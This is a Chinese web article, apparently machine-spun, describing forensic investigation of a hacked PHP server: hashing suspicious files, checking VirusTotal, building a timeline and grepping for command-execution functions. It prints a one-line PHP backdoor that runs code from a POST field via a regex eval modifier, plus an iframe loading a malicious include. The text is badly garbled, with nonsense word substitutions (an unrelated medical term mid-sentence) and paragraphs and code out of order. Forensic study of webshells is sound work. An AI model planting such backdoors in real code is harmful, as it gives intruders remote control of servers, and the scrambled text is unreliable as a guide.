或者比较它们的MD5值：

md5sum Xjrop.php 
 
md5sum Nwfqx.php 

这是一个与办事器上的所有文件有关的异常有效的列表，包含了文件的owner id、group id，以及文件被修改、拜访和更改的时光戳。

还有2个文件的名字比较奇怪，bjrnpf.php和jemkwl.php，全部是小写这两个文件是雷同的，但有别于其他文件。一个可疑的可履行文件被定名为windoze.exe，我困惑一些恶意软件可能已经大年夜该主机传播出去了。应用md5sum计算这个文件的哈希值，在VirusTotal进行检查，(留意上传到VirusTotal的文件可以被其他研究人员看到，是公共的，所以最好不要上传可能含有保密或敏感信息的器械，可以起首应用哈希值进行分析)。VirusTotal的分析结不雅肯定该文件为木马法度榜样。是以我将它保存下来以备后续的分析。

分析这些PHP shell样本，发明某些文件中包含如下信息：

留意它们的标题“404-server!!”。用搜刮引擎搜刮胰腺癌，发清楚明了其他一些可能受感染的办事器信息：

<?php @preg_WordStr(“/[pageerror]/e”,$_POST[‘mkf3wapa’],”saft”); ?> 

这一行代码的含义是正则匹配“saft”字符串中的小写字母“pageerror”，将其调换成$_POST 变量 “mkf3wapa”。因为返回值被忽视，所以我不知道这个代码片段具体的感化是什么。

./mac-robber / > /root/forensics/timeline.txt 

然而，应用Google搜刮，发明一大年夜堆的萌芽结不雅，注解这段代码与黑客上传的“404-Server!!”shell脚本有接洽，它们同时涌如今被入侵的办事器上。是以，如不雅内涵办事器上找到此代码，它可能存在被感染的威逼，您应当对办事器做进一步的检查。

审查包含“404-Server!!”的shell文件的源代码，发明它们供给了上传/查看/删除文件以及调剂权限的功能。

检查文件的所有者和用户组，发明它们都是用PHP过程的所有者创建的，所以它们很可能是由被入侵的PHP应用法度榜样创建的。

另一个被感染的文件名为way.php，它只是包含潦攀来自另一个办事器的一个文件，源代码如下所示：

这段代码中指向的恶意办事器向我们展示了一个有趣的消息：

可能是因为我没有应用精确的referer头，或者是办事器不供给恶意负载了。

在一个HTML文件中，发明如下代码：

敕令显示大年夜办事器中输出的晃荡的连接(TCP和UDP)。然而，这两个清单都没有发明可疑的晃荡。

<iframe src=”way.php”></iframe> 

寻找更多的Shells

治理员供给的可疑的Shell文件是因为它们有比较特别的、奇怪的定名，接下来，我开端经由过程应用法度榜样代率攀来寻找更多的可疑文件，尤其是，您可能欲望查找在办事器上履行敕令的函数，如：

passthru 
 
exec 
 
shell_exec 
 
eval 
 
system 

应用以下敕令搜刮所有包含这些函数的文件：

egrep -rin “system|passthru|exec|shell_exec|eval” /var/www/vhosts/xyz/ > ~/forensics/results_shell_grep.txt 

大年夜日记中查看调用这些脚本对象的信息，发明几个重要来自于亚洲的IP地址，但因为apache日记琅绫腔有记录POST数据的嘻嘻，因而无法确认经由过程这些Shells上传了哪些文件。

人们经常会应用 *.php的后缀来搜刮可疑的PHP文件，但PHP文件其实还有其他的扩大名，如*.php5、*.php4 或 *.phps，如不雅只检查可能*.php的话，可能会错过很多。所以，如不雅前提许可的话，可以搜刮一下上述所有扩大名的文件。也有一些恶意文件应用随便率性扩大名，由更规矩的PHP文件加载，是以也应当测验测验检测一下这类文件。

　　推荐阅读

　　给Android开发者的31个Pro 版进阶小贴士

51CTO诚邀您9月23号和秒拍/国美/美团元专家一路聊智能CDN的优化之路，抓紧时光哦！ 响应式编程办法能帮你更快地编写交互式应用，并闪开产生活更轻松更有趣。在你成为一名优良的安卓开辟者的>>>详细阅读

本文标题：当PHP服务器被黑客入侵了该怎么办？

地址：http://www.17bianji.com/lsqh/37462.html

 1/2    1